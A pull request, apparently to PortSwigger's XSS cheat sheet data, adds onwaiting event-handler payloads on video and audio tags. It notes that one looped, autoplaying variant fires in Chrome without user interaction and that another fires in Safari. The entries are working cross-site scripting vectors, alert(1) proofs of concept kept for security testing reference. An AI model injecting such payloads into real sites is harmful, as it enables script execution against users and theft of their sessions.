### PR TITLE
Add onwaiting event

### DIFF
--- a/json/events.json
+++ b/json/events.json
@@ -9554,5 +9554,47 @@
                 "interaction": true
             }
         ]
+    },
+    "onwaiting": {
+        "description": "Fires when the video/audio attempts to play",
+        "tags": [
+            {
+                "tag": "video",
+                "code": "<video controls onwaiting=alert(1)><source src=x type=x></video>",
+                "browsers": [
+                    "safari"
+                ],
+                "interaction": true
+            },
+            {
+                "tag": "audio",
+                "code": "<audio controls onwaiting=alert(1)><source src=x type=x></audio>",
+                "browsers": [
+                    "safari"
+                ],
+                "interaction": true
+            }
+        ]
+    },
+    "onwaiting(loop)": {
+        "description": "Fires when the video/audio attempts to replay",
+        "tags": [
+            {
+                "tag": "video",
+                "code": "<video controls loop muted autoplay onwaiting=alert(1)><source src=validvideo.mp4 type=video/mp4></video>",
+                "browsers": [
+                    "chrome"
+                ],
+                "interaction": false
+            },
+            {
+                "tag": "audio",
+                "code": "<audio controls loop muted autoplay onwaiting=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>",
+                "browsers": [
+                    "chrome"
+                ],
+                "interaction": false
+            }
+        ]
     }
 }


### PR DESCRIPTION
The onwaiting event handler doesn't work by default, as mentioned in this issue: https://github.com/PortSwigger/xss-cheatsheet-data/issues/57. However, I found that it works in Chrome when using a loop attribute without need user interaction. For a quick demonstration, see [this link](https://portswigger-labs.net/xss/xss.php?context=html&x=%3Cvideo%20controls%20loop%20muted%20autoplay%20onwaiting=alert(1)%3E%3Csource%20src=validvideo.mp4%20type=video/mp4%3E%3C/video%3E).

Additionally, in Safari, if the source type isn't identified, clicking play will still work. For a quick demonstration, see [this link](https://portswigger-labs.net/xss/xss.php?context=html&x=%3Cvideo%20controls%20onwaiting=alert(1)%3E%3Csource%20src=x%20type=x%3E%3C/video%3E).
